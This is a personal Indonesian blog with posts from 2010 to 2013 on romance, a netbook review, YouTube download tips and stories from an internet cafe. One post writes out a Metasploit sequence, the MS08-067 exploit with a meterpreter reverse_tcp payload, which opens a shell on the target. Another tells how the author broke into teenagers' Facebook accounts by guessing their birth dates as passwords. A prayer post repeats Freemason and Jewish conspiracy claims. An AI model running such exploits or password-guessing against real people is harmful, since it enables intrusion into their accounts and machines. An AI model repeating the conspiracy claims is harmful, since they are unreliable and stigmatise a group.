Tegur Sapa Buat Netters Praye

September 25, 2013

Apa ada sedang mengklik tab baru? pakai akun SSH? apa yang anda bisa lakukan?

hanya duduk2 seperti itu berjam-jam? shit!!


Andai Aku Bisa Tarik Lidah Itu

May 31, 2012

That title reminds me of that day, i Called it “Skype n’ YM day“. Started by Joke and ended by our sincere smile. Short but stunning enough to memorize for rest of my life. IDM you mentioned? did you say it at the beginning? still so clear the way you say it.

Has it been 5 times meeting? oh God.. the first and the last one was the best as usual and its true. Hey litle boy!!! what was your name again? Hafiz right?? I smilled remembering your fingers typing in my netbook’s keyboard, your fingers was really cute and tiny ย ๐Ÿ˜€ and we met twice litle master and the second was the day you got your cocolate i promised the day before.

Bangke!!! i never met your father till the day the story ends, nor your mother even i really wanted to but… it’s OK since we might not know what it would be ๐Ÿ™‚

These are the words we used to type and say on each chat or conversation on the call:

  • dodol
  • bangke
  • dongol
  • muk landengm
  • abang
  • neng

:mrgreen: so funny and i won’t forget it. Night after night, how many hours? Ok..Ok.. stop it.. ย i am going to take my Magrib Prayer then.

Gili TR, Mess, My Bed, 30May12 6:19 PM, time for Praying.


Kenyataan Yang Membingungkan VS Hayalan Yang Indah.. WHAT THE F~~K

March 31, 2012

Dear God,

Apakah ini nyata? or just the way THEY Fuck my Mind? Rahmat bagimu wahai Muhammad-ku, aku ikuti doa yang engkau tuntun bagi GENERASI AKHIR yang penuh BULLSHIT ini.

Dear God,

Tunjukkanlah bahwa yang benar itu terlihat benar dan yang salah itu TidaK berkamuflase sehingga membutakan kami para KORBAN IBLIS yang engkau LAKNAT.

Dear God,

i’m sure accepting the fact about : THE ARRIVAL, THE NEW RULER OF THE WORLD , PHASE 3, SATANISME KEBUDAYAAN MODERN, DANI DEWA DAN YAHUDI, FREEMASON WAR AGAINST ISLAM, FOOD INC, dan banyak lagi. tapi Tuhan… budakmu ini sungguh dibingungkan dengan fakta ini. Please show me the right Path.

Dear God,

Begitu lancangnya THE ZEITGEIST dengan hanyalan indahnya. But thanks Peter Joseph for opening up my mind about how Money has been created in your Addendum, How The Government enslaved by the Dajjal you’ve cursed. Tapi jujur aku setuju dengan beberapa hal, misalnya rencana Menghidupkan kembali bumi yang telah di KOTORI para RAKUS ITU.

Dear God,

In this environment i live, we’ve brain washed away to think like we shouldn’t, so please My Lord God, Show Us To the Real Path. How am i gonna live like this? without you helping us with your ALMIGHTY.

Dear God,

I give thanks to you for everything that came, will come, and being stepped.

ALHAMDULILLAHI ROBBIL’AALAMIIN

ย 

your Slave

ย 


Si Slim Acer Aspire One 722

September 4, 2011

Acer eMachines d720 yang dulu aku tengteng kemana aja kian hari terasa lebih berat dari sebelumnya, entah karena aku makin langsing atau memang bobot dosa ntu laptop yang HDD-nya hamper retak karena film sucks !! ๐Ÿ˜€ who knows? belum lagi ketika tiap minggu harus bolak balik sebrangin air asin ๐Ÿ˜€ rasanya sucks deh pokoknya.

Beda dengan yang sekarang, aku merasa tambah GEMUK euy!! eh ntapi keknya bukan itu ~ eh ini ~ anu~ aku gak gwemuk but still slim like the hell si slim Acer Aspire One 722 itu. Ringan dan tipis (ini bukan ciri-ciri fisik aku loh :mrgreen: ) . Diinstalin xp sp tri mulus abis, errr!!! Kok WINDOWS siy? Eh!! Yah!!!!! Iya sori sori, organnya emang perlu dihajar. semingguan nyoba berbagai distrow tapi gak ada yang akur, fuck !!! untung aku gak banting-banting, sayang Rp. 2,9. Gimana gak eSmosi coba, BT5 ampe kiamat 11 kali juga gak bakalan akur ma mesinnya.

Acer aspire one 722 black

  • AMD Dual-Core Processor C-50 (1.0 Ghz)
  • 2 GB DDR3
  • 320 GB HDD
  • ATI Radeon
  • 1366 x 768 px (nonton video HD tetep mulus, motoGPurt3 lancar, winning 11 juga full !!! mulus nying..)
  • 11,6 inch loh !!
  • full keyboard (tapi anjrit tombol panahnya kecil2 kayak tai)
  • webcam cuma 0,3 mpx. giiiiiii gigi, ancur!!!
  • card reader available, sebelah kanan
  • port LAN-nya sebelah kiri setelah carger hole
  • port VGA sebelah kiri setelah port LAN
  • 3 USB port, satu di sebelah kiri dan 2 di sebelah kanan tetanggaan dengan socket audio dan microphone jack.
  • HDMI port available dan di sebelah kiri paling bawah
  • batre-nya 6-cell loh? :mrgreen:
  • tutup plastiknya ada kayak water drop loh :mrgreen:
  • touch pad-nya mantap abis dengan tombol empuk, multi-touchpad lagi (serasa kek lagi colek-colek skrin-nya iPad or iPhone or ayshit!! damn!! mantap :mrgreen:
  • chargernya mantap, gak ribet karena kabelnya kecil menyatu dengan adaptor, juga ujung adaptor nyang ke listrik bisa diatur mengikuti model socket listrik. asyik banget ๐Ÿ˜€
  • tidak bisa ngejalanin Backtrack, shit !!!
  • ubuntu netbook remix lemot abis, desktop edition nyang 11.04 oke tapi displaynya unsuported like hell, but works !! ๐Ÿ˜ฆ

Dan aku nyesel belinya, bukan karena BIG DEAL tapi karena gak bisa ngejalanin backtrack. seandainya bisa pasti aku gak akan pernah mau jual dan tentu GAK BAKALAN NGINSTALL SI NDUS-NDUS, eh tapi aku gak jual loh, :mrgreen:, cuman niat.

mungkin kalo ada yang mau tukeran pake Asus eeePC 1015 PX aku pasti mau, tapi yang black yah? ๐Ÿ˜€

 


gud bai mai lefly bilovt

June 11, 2011

Aku sungguh tidak bermaksud mengabaikanmu dan memang… itu bukan bagian dari sifatku. Perjumpaan pertama kitapun waktu itu sungguh penuh dengan kedustaan si bangsat comblang itu, sialan!! dia cerita tentang kelebihan fisikmu padahal aku tidak mengharapkan kamu yang sesempurna itu. Cukuplah kamu yang selalu siap menemaniku kesetiap tempat yang ingin aku kunjungi dan tentu setiap saat.

Tentang kelebihanmu.. kamu tidak cerewet dan tetap menuruti kata-kataku, Honto ni Arigato yo !!! ๐Ÿ™‚ . Kamu selalu mampu melakukan setiap permintaanku tanpa mengeluh dan yang paling penting lagi dimanapun aku kamu selalu ada, thanks a lot

๐Ÿ˜ฆ

Kini kau bukan untukku lagi, mungkin aku kurang ajar karena ketika aku harus terpaksa menyerah dan melepasmu dari tanganku, sungguh aku tidak bermaksud begitu.Aku tidak pintar beralasan mengenai apa alasan pasti aku melepasmu meskipun dalam hati ini masih tertanam rasa sayang dan sulit aku lupakan kenang-kenangan kita.

Gomen Nasai…


Night Of shit

February 11, 2011

There you go with curiosity of gaining access, when time keeps you fading but nonsenses keep you up to date.. a friend named “Raja Molor” from Aceh still wake up in the night waiting for the dawn comes and ask him to sleep with his laptop on stand by mode. He means it.. really he does…

he types….

msfconsole

– use windows/smb/ms08_067_netapi

– set payload windows/meterpreter/reverse_tcp

– set rhost 192.168.2.10

– set lhost 192.168.2.3

– exploit

and what else does he need to type ?

– help


ketika akhirnya tidak menemukan alasan lain

October 27, 2010

alangkah malangnya ketika tidak menemukan alasan untuk memulai hari-harinya, kemudian diapun melupakan pencarian bodoh tentang arti itu, senyumnya mengembang ketika meliat lingkungan sekitar.

ternyata hal-hal seperti -meliat senyum si dion (kembarannya Kipli temen saprol)- bisa bikin cekikikan :mrgreen: apalagi ketika beliau nonjok muka ganteng ini saat aku panggliย  “pli sini pli “. Betapa sangar mukanya yang lucu ketika panggilan kipli terdengar di telinga sucinya. Namun aku terheran-heran ketika sangar berubah menjadi senyum lucu gaya pepsoden ketika ajakan chatnya di FB diterima ๐Ÿ˜€ , ini dia si Kipli . Jangan heran ketika chat ma beliau, berbagai emoticon akan dia kirim ke chatboxmu

Anak SD ini sering maen ke warnet Spread Plus dimana saya bekerja, dia akan tetap setia di sampingku dengan rasa ingin taunya tentang internet dan begitulah hari-hari indah itu berawal :).

Suatu ketika, ketika beliau saya minta jagain warnet untuk keluar beli nasi, laper atuh..!!, sebelum beranjak saya minta supaya tidak meninggalkan warnet sebelum saya balik dah eh..!!! ternyata ketika BangsatShitFuck listrik PLN mati dan bikin pelanggan hari itu ribut dan tentu membuat temen kecilku si Kipli bingung dan lupa pesanku sebelumnya untuk tetap di sana, beliau berlari mencariku ketempat jualan nasi namun begitu malang nasibnya sehingga tidak kunjung bersua denganku. beliau balik kewarnet dengan besar harapan saya sudah di sana dan eeeeeeee… malah saya belum nyampe warnet juga ๐Ÿ˜† , beliaupun lebih memilih mencari dan mencari ketimbang mndengarkan ocehan para pelanggan sexy (anak-anak SMA, SMK waktu itu) sampai akhirnya ingat pesanku dan akhirnya menunggu ๐Ÿ˜ณย  . Ketika saya balik tanpa basa basi tangan kecilnya menghantam perutKU aaaaaaghhhhh… ๐Ÿ˜ก

silahkan tuan kipli yang terhormat main internetan di nomor 2 gratis 30 menit ”ย  ๐Ÿ™„ , ucapan ramahku membuatnya kegirangan dan cepet lupa dengan kelalaianku sehingga membuat beliau menunggu lama dan dicubitin oleh kakak-kakak seksi para pesbuker ๐Ÿ˜‰ .

Maaf Kipli temen kecilku yang penuh tanggung jawab dan ramah lingkungan :mrgreen: , kehadiranmu mengisi hari-hariku :mrgreen:ย  ,ย  Terimakasih telah menyadarkanku akan maksud dari berada di sini ๐Ÿ™‚ .


ubuntu lucid lo bisa embat video youtube , gak percaya? ya sudahlah…hm..hm..hmm..

August 3, 2010

๐Ÿ˜€ย  wah asyik bang kalo bisa download video di youtube melalui ubuntu..ย  ๐Ÿ™‚ย  wah… apalagi hobi download saya bisa terpenuhi sepenuhnya tanpa kekurangan suatu apapapun jugaย  wah……. emang bener-bener asyik kalo menjadi tau karena awalnya tidak tau ๐Ÿ˜›ย  wah………..sekarang mo hampir bulan puasa jadi kudu banyak-banyak download video-video islam ๐Ÿ˜ฆย  wah……………ย  ๐Ÿ˜€

wah…………………..

wah…………………………

wah………………………….hhahaha..

huwah………………………….hahahah…..

cukup……………………..!!!!!!!!!!!!

sekali lagi cukup!!!!!!!!!!!!!

tapi kang……………

cukup…!!!!!!

dan akhirnya cukuplah sudah yang dulu belum cukup karena sekarang udah tercukupi dengan secukup-cukupnya.

we jangan sewot…. ini blog saya..jadi mo nulis apa aja boleh.. ini blog tempat numpahin apa yang saya mau sesuai dengan keadaan hati saya saat saya menulisnya ๐Ÿ˜€ย  http://www.youtube.comย  udah kebuka tapi bingung download-nya gimana? ๐Ÿ˜ฆย  akhirnya setelah setaun.. (kurang lebihlah) akupun akhirnya begini:

cara 1. buka youtube, cari video yang saya mau pake keyword… terus biarin jalan tu video ampe kelar… cari video tadi di folder /tmp terus tonton langsung… ha…tapi gak seru juga tuh.. itu gak boleh ditutup tab yang sedang jalan video di youtubenya tapi lumayan membantu.

cara 2. sudo apt-get install youtube-dl.ย  selese install langsung pake.. jadi cara makenya gini: buka terminal…. tulis di sana ‘youtube-dl url-vidoe-youtube’ . nanti hasilnya cari di directory home. contoh : youtube-dl http://www.youtube.com/watch?v=KjDIfOlae7g

cara 3. nginstall xp aje lewat virtualbox ose… nginstalnyapun yang ringan aja (xp beast edition) cukup untuk dipake nginstall firefox dan idm aje..oh winrar jg loh… (malu masih bikin dosa)..

cara 4. usut-usut lagi gugel…. ah… mending saya belajar ilmu sabar .. akhirnya kasar saya install add-on-nya mozilla firefox yang “downloadhelper 4.8“.. haaaaaaaaaaaik…. jadi tu yang ada gambar tiga balon menyatu muter-muter di toolbar-nya mozilla firefox.. tinggal buka youtube terus ntar keliatan di sana video yang bisa diunduh… ah… karena saya seneng download yang High Quality atau or High Definition maka dengan sadar saya nambahin ‘&fmt=18‘ย  atau kalo nggak saya ganti angka 18 dengan 22 di bagian akhir url video ber-sang-kutan (tanpa g).. jadi tinggal download pilihan jenis video yang di-mau.. trus download.. wokeh.. mozillapun mengutus tukang unduh-nya.

cara 5. coba nambahin kata ‘kick’ di urlnya . jadi http://www.youtube.com/watch/blahpecahblah…ย  akan saya tambah menjadi http://www.kickyoutube.com/watch/blahpecahblah…. nah yang ini butuh java terinstall di ubuntu saya lucid.. pilihan jenis qualitas video tinggal pilih

cara 6. ada lagi yang nyuruh saya ngeganti kata ‘kick‘ dengan kata ‘kiss‘ย  .. nah yang ini juga bersyarat yaitu java harus sudah terpasang baik di ubuntu saya…ย  ya tinggal buka synaptic kan?

setidaknya itulah pengalaman bego sekaligus genius download video di situs youtube..

eh tapi ini ada lagi… kalo mau video yang kualitas bagus di youtube…. tambahin kata HD di keyword anda.. terus pilih ntar yang hasil yang HD.. di bagian bawah kotak video ntu ada tulisan watch in HD.. nah di sana pilih yang HD..ย  tapi bisakok nambahin langsung code ‘&fmt=18’ di akhir url video berangsuktan.. nah begitu..Terusnya lagi kalo mau hanya sekedar nonto videonya youtube dan mo lompat ke menit kesekian karena alasan tertentu, nah untuk kasus ini anda coba tambahkan code ‘#t=01m30s‘ย  (maksudnya lompat ke ke menit 1 dan detik ke 30).

nah.. waaaaahhhhh…….puas saya

yang mo nambahin cara yang lain silahkan.. sangat disarankan lo… ๐Ÿ˜€


Ganti foto facebook teman diam-diam

July 14, 2010

semakin banyak saja pengguna facebook di daerah saya. mulai dari orang dewasa sampai anak baru sd, mulai dari yang sudah kenal komputer sampe yang gak pernah megang komputer sama sekali tapi hanya dengan bermodalkan hp. jadi ingat waktu itu……….

suatu saat..ketika sedang asyik di korsi operator warnet sambil ngerokok dan minum kopi sembari gulir-gulirin tombol gulir mouse dengan mata tertuju serius ke layar laptop yang sedang nampilin hasil temuan-nya seperti biasa.. tiba tiba ada seorang bapak-bapak dateng,, terus nanya saya gini ” mas mas… eee.. ini…. warnet ya?”, saya jawab ” oh iya pak betul.., mau internetan pak?”, dan si bapak sambil garuk-garuk mengatakan “iya,, mo belajar facebook mas..”.

nah itu lo buktinya.. udah bapak-bapak kok tetep ada yang penasaran ma facebokk. jadi saya malah makin penasaran lagi.. sebenarnya yang mereka lakukan di facebook mereka apa sih…?

akhirnya sempet terdiam saya dalam renungan mendalam…
dan Nah !!!!!!!!!!!!!!!!!!!!!!!!!!!. ada ide..ย  :))

jadi begini… sibapak tadi kira-kira setelah daftar facebook.. password yang dia masukkan dan gampang di ingat kira2 apa? termasuk anak2 ABEGEH yang sering ngerayain ulang taon-nya menurut saya akan menggunakan tanggal lahirnya untuk dijadikan password..

sayapun mulai meliat-liat temen facebook saya yang abegeh… wit…….. mari kita lupakan yang bpak tadi… saya mah gak tertarik ngebahas bapak-bapak.. kalo abegeh bolehlah…..

setelah beberapa saat saya mencoba login dengan username berupa ALAMAT EMAIL si abegeh dengan password berupa TANGGAL LAHIR… sayapun berhasi login sebanyak 2 kali dari 20 kali percobaan….,

horeeeeeeeeee…..!!! dakupun nyempatin beberapa saat sebelum logout untuk ngelirik-lirik koleksi foto.. eh…kepikiran tuk ganti foto-nya… hati yang kejam ini-pun saya redam supaya gak ketauan kalo ada yang pernah nyusup ke facebook sipemilik..
nah..kok malah semakin jahat saya…dengan merahasiakan kejahatan telah masuk facebook orang tanpa ijin ples lagi gak mau ketauan alias diam-diam kepengen ngebuka lagi itu facebook di laen hari..

ah… tapi jahat gak siy?… padahal saya gak ngapa-ngapain… saya cuma ngambil alamat email si abegeh beserta tanggal lahirnya yang jelas-jelas dia share di profilenya..
toh say make komputer sendiri kan? toh saya gak jadi ganti foto…. tapi kok saya sendiri masih ngerasa jahat ya?
tapi kalo dipikir pikir isi facebook itu gak ada yang penting … jadi mungkin saya gak jahat-jahat amat karena gak berfikir untuk ganti password diam-diam… tapi ah………. ya sudahlah………..dengar ku bernyanyi…lala lala la lala a yeye yayaya.. dudum dudum di dalam mimpi…. haaaaa…

SATU KATA LAGI… NGGAK BOLEH JAHAAAAAAAAAAAAAAAAAT!!!!!!!!!!!!!!!!!!!!!!!!!1


Kehidupan Liar

July 4, 2010

Kehdupan binatang di alama bebas